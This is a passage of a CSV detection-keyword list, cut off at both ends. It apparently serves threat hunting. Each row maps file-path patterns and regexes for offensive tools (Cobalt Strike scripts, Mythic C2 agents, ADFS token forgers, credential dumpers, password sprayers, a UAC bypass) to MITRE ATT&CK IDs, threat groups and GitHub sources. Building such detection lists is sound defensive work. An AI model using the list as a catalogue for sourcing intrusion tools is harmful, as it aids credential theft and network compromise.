Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*/AddUser-Bof/*",".{0,1000}\/AddUser\-Bof\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*/ADeleg.exe*",".{0,1000}\/ADeleg\.exe.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*/ADeleg.exe*",".{0,1000}\/ADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*/adeleg.git*",".{0,1000}\/adeleg\.git.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*/adeleg.pdb*",".{0,1000}\/adeleg\.pdb.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*/ADeleginator.git*",".{0,1000}\/ADeleginator\.git.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*/ADFSDump.exe*",".{0,1000}\/ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ADFSDump.git*",".{0,1000}\/ADFSDump\.git.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*/ADFSpoof.py*",".{0,1000}\/ADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "*/ADFSpray*",".{0,1000}\/ADFSpray.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*/ADFSRelay.git*",".{0,1000}\/ADFSRelay\.git.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*/ADFSRelay.go*",".{0,1000}\/ADFSRelay\.go.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*/ADHunt.git*",".{0,1000}\/ADHunt\.git.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*/adidnsdump.git*",".{0,1000}\/adidnsdump\.git.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*/ad-ldap-enum.git*",".{0,1000}\/ad\-ldap\-enum\.git.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","AD Enumeration","6","4","301","67","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*/adm2sys.py*",".{0,1000}\/adm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*/admin_persistence_winlogon.c*",".{0,1000}\/admin_persistence_winlogon\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*/Admin2Sys.git*",".{0,1000}\/Admin2Sys\.git.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","37","16","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*/admin-panels.txt*",".{0,1000}\/admin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/ADRecon*",".{0,1000}\/ADRecon.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Information Gathering","https://github.com/sense-of-security/ADRecon","1","1","N/A","N/A","10","1609","274","2020-06-15T05:23:14Z","2017-11-29T23:01:53Z" "*/ADSearch.exe*",".{0,1000}\/ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ADSearch.git*",".{0,1000}\/ADSearch\.git.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*/aerosol.py*",".{0,1000}\/aerosol\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/afp-brute.nse*",".{0,1000}\/afp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afp-ls.nse*",".{0,1000}\/afp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afp-path-vuln.nse*",".{0,1000}\/afp\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afp-serverinfo.nse*",".{0,1000}\/afp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afp-showmount.nse*",".{0,1000}\/afp\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afrog-pocs/*",".{0,1000}\/afrog\-pocs\/.{0,1000}","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/zan8in/afrog","1","1","N/A","N/A","10","2823","334","2024-04-30T08:02:02Z","2022-02-24T06:00:32Z" "*/agent -connect http* --proxy*",".{0,1000}\/agent\s\-connect\shttp.{0,1000}\s\-\-proxy.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*/agent.ps1.oct*",".{0,1000}\/agent\.ps1\.oct.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/agent/C/src/*",".{0,1000}\/agent\/C\/src\/.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/agent/stagers/dropbox.py*",".{0,1000}\/agent\/stagers\/dropbox\.py.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*/agent_code/Apollo/*",".{0,1000}\/agent_code\/Apollo\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/agent_code/Athena*",".{0,1000}\/agent_code\/Athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/agent_code/cmd_executor*",".{0,1000}\/agent_code\/cmd_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/agent_code/dll.go*",".{0,1000}\/agent_code\/dll\.go.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*/agent_code/merlin.*",".{0,1000}\/agent_code\/merlin\..{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*/agent_code/powershell_executor*",".{0,1000}\/agent_code\/powershell_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/agent_code/sh_executor*",".{0,1000}\/agent_code\/sh_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/agent_code/zsh_executor*",".{0,1000}\/agent_code\/zsh_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/agent_functions/*.py*",".{0,1000}\/agent_functions\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/agent_icons/athena.svg*",".{0,1000}\/agent_icons\/athena\.svg.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/AggressiveClean.cna*",".{0,1000}\/AggressiveClean\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*/aggressor/*.java*",".{0,1000}\/aggressor\/.{0,1000}\.java.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/aggressor-powerview*",".{0,1000}\/aggressor\-powerview.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","150","40","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z" "*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 